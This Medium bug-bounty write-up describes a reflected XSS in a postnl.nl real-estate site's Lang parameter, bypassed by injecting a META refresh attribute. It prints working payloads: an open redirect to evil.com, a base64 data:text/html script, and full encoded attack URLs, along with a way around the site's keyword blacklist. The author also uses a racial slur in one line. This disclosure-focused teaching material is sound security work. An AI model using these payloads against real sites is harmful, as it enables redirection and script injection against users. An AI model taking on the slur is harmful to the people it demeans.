XSS bypass using META tag in realestate.postnl.nl

Prial Islam Khan
Nov 18, 2018 · 3 min read

Hi readers ,

Today I will write about a XSS Vulnerability I reported to postnl.nl bug bounty Program .

Vulnerable Endpoint :- http://realestate.postnl.nl/?Lang=

To test a normal Reflected XSS I Input “><xsstest> in the Lang parameter and in source it was reflected properly inside META tag like below :-

<meta name="language" content=""><xsstest>" />

Looks simple right ? Then wait a little :’) . Then I Inputted “><img src=x> and I got :-

Surprise you nigga 🥳🥳🥳

I tried with many HTML tags and I got 2 points here :-

  • Any Valid HTML tag is not allowed .
  • I can created any attributes here .

So I googled for meta tag attributes and got :-

looks interesting 🤔🤔🤔

The http-equiv attribute took my attention . Now I again google more about it and learned that :-

META tag has the http-equiv directive. This directive allows you to define the equivalent of an HTTP header in the HTML code . The http-equiv directive can take a value of refresh , which can be used to redirect a user to another page.

Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and response was :-

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

And I got redirected to evil.com . So I have open redirection now . Now we can try for Data URI XSS . So I input :- 0;javascript:alert(1)"HTTP-EQUIV="refresh" and response was :-

This was again Triaged for the keyword javascript used in payload . So I used Base64 encoded payload :- 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" and response source was :-

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I got XSS popup .

I reported it to their Zerocopter report form . Then they deployed a Fix by blacklisting the data:text/html;base64 keyword like they have blacklisted JavaScript keyword but still I can do Open Redirect when a user visits :- http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22

Looks cool 🙄🙄🙄

They again Fixed the issue and listed My name on their Hall Of Fame page & also offered to send some goodies 😍😍😍 .

😍😍😍

Thanks for reading .

Follow me on twitter

If you have any query ask me on Facebook

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Prial Islam Khan

Written by

A teenager boy with passion of Breaking Security .

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Prial Islam Khan

Written by

A teenager boy with passion of Breaking Security .

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store